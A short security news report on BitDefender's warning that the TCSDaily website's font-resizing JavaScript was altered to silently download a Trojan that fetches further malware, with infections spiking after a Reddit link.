BitDefender issued a warning today that an attacker has added an instruction to download an executable to a bit of previously innocuous Java Script which handles font resizing – one which exists in every public-facing page of the TCSDaily news website.
The number of systems exposed to the attack suddenly spiked when a post linking to an article hosted on the compromised TCSDaily website appeared on the social news aggregator site Reddit.
The malicious Java Script makes the user’s browser download and execute a Trojan. Downloader.Small.BIB – which is hosted on a Chinese website, which is probably also compromised.
“It’s a pretty simple piece of malware, but it’s obfuscated, so most antivirus programs could not detect it,” said Marius Tivadar, BitDefender antivirus researcher. “A drive-by download is like that – one often gets infected at first with something that is nearly innocuous and really stealthy, the kind of thing antivirus software is most likely to just ignore, but once your system is infected, all bets are off.”
The Trojan downloader itself downloads, from the same Chinese website, four other bits of malware, namely a backdoor, a bit of adware, a password stealer and another Trojan, by the names of, respectively Backdoor.Poisonivy.M, Adware.Bho.WOX, Trojan.Pws.OnlineGames.AUD and Trojan.Agent.ADL.
Trojan.Agent.ADL also downloads yet more malware from yet another website.
“We were hot on the trail and finding new malware everywhere as the analysis proceeded,” BitDefender antivirus researcher Mihai Calota, who had been tasked with charting out the threat. “It’s like diving into caves – there’s always this new nook which turns out to be a passage to a new room.”No tag for this post.